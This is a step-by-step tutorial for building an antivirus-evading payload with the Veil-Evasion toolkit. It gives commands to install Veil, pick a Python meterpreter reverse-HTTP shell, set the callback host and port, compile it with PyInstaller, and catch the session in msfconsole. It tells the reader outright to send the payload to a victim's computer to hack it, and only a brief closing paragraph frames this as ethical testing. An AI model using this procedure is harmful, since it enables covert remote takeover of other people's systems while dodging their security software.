How to create an Undetectable Payload using the Veil-Evasion Toolkit?
In this section, we will see a complete step-by-step process to create an Undetectable Payload using the Veil-Evasion Toolkit with all essential commands.
Step 1: Update the System
Once the terminal is been launched, we need to update the system repositories by executing the below command in the terminal. We can use the apt manager to update the system.
sudo apt update
Step 2: Installation of Veil-Evasion Toolkit
To install the Veil-Evasion toolkit on your Linux system, open a terminal window and enter this command.
apt install veil
After entering the installation command for the Veil-Evasion toolkit in the terminal, when prompted to continue, simply type “Y” and press Enter to confirm and proceed with the installation. This confirms your intention to continue the installation process as prompted by the system.
After the Veil-Evasion toolkit installation, clear the terminal, and launch Veil by typing “veil.” Once prompted about Veil installation, type “S” to choose the silent installation method, ensuring a smoother download process with minimal user interaction. This method simplifies the installation by automatically selecting default options during the setup.
Upon the completion of the Veil-Evasion toolkit installation, a “Done” message will be displayed. To finalize the process, type “exit” to close the current session and then launch a new terminal session. This ensures that any changes made during the installation take effect, allowing you to start using Veil-Evasion in the new terminal session.
Step 3: Update the Veil-Evasion Toolkit
To update the Veil-Evasion toolkit to the latest version, execute the following two commands in the terminal. Type “Veil” to launch the Veil-Evasion toolkit. Once inside Veil, type “Update” to initiate the update process.
veil
update
Updating the Veil-Evasion toolkit to the latest version ensures that you have access to the most recent evasion techniques. This is crucial for staying ahead in the dynamic field of cybersecurity, as the toolkit evolves to incorporate new strategies and enhancements aimed at effectively bypassing security measures.
Step 4: Creating the Undetectable Payload
After updating, you will see two available tools. The first tool is the Evasion tool and the second tool is the Ordnance tool. We are going to use the Evasion tool. This tool provides functionalities like evading or hiding Our Payload from Being Captured by the Victim.
In the Veil program, view the list of available tools and select the Evasion tool by typing the following command:
use 1
To view the payloads available in the Evasion tool, type the following command into the interface:
list
Step 5: Selection of Payload
We will use payload number 26 (python/meterpreter/rev_http.py) within the Evasion tool for our needs.
Selecting Option 26
rev_http.py is a Python-based meterpreter payload/script that sets up a reverse shell connection over HTTP that allows remote access/control of the target or compromised system it is executed/run on.
Select meterpreter reverse HTTP payload 26 by typing the following command.
use 26
Step 6: Set of LHOST and LPORT
Next, we must configure the Local Host (LHOST) and Local Port (LPORT) settings for the reverse shell payload to connect back to our system. The default LPORT is set to 4444, but we can leave that as it is. To set the LHOST and finalize the payload connection settings, follow this procedure:
Set the LHOST IP to your local system’s IP so the shell connects back to you:
set lhost IP Address
Step 7: Generating the Payload
We will now generate the payload using the parameters we have set, to create our customized reverse shell executable. To accomplish this, we will type the following sequence of commands at the interface prompt:
generate
The tool will prompt us to select the type of executable file we want to generate the payload.
Choose Option 1 (PyInstaller)
We have now successfully generated the payload file containing the embedded reverse shell code. The Evasion framework indicates the payload generation has been completed by outputting helpful file details to the console:
Step 8: Locate the Payload
Copy the Location of the files and then paste them into the Linux file manager.
Step 9: Use of Resource File
Now you know how to create the Payload & where the Payload is located. Now, you just have to send this payload to the victim’s computer to hack their System. If you want to Open the Session of this Payload Just Paste the resource files into the Terminal by typing this command at first.
msfconsole -r ( Resource_file )
With the help of these Resource files you don’t have to set the options of the Payload again it will automatically get set in the session. Just Type show options to see if the settings of our Payload are already set.
show options
Creating An Undetectable Payload Using Veil-Evasion Toolkit
In Cybersecurity, understanding and mitigating potential threats is important. This article explores the creation of an undetectable payload using the Veil-Evasion toolkit, a powerful tool in the context of ethical hackers and security professionals. The Veil-Evasion toolkit specializes in generating payloads that can evade traditional antivirus solutions, allowing security professionals to assess the effectiveness of their defense mechanisms.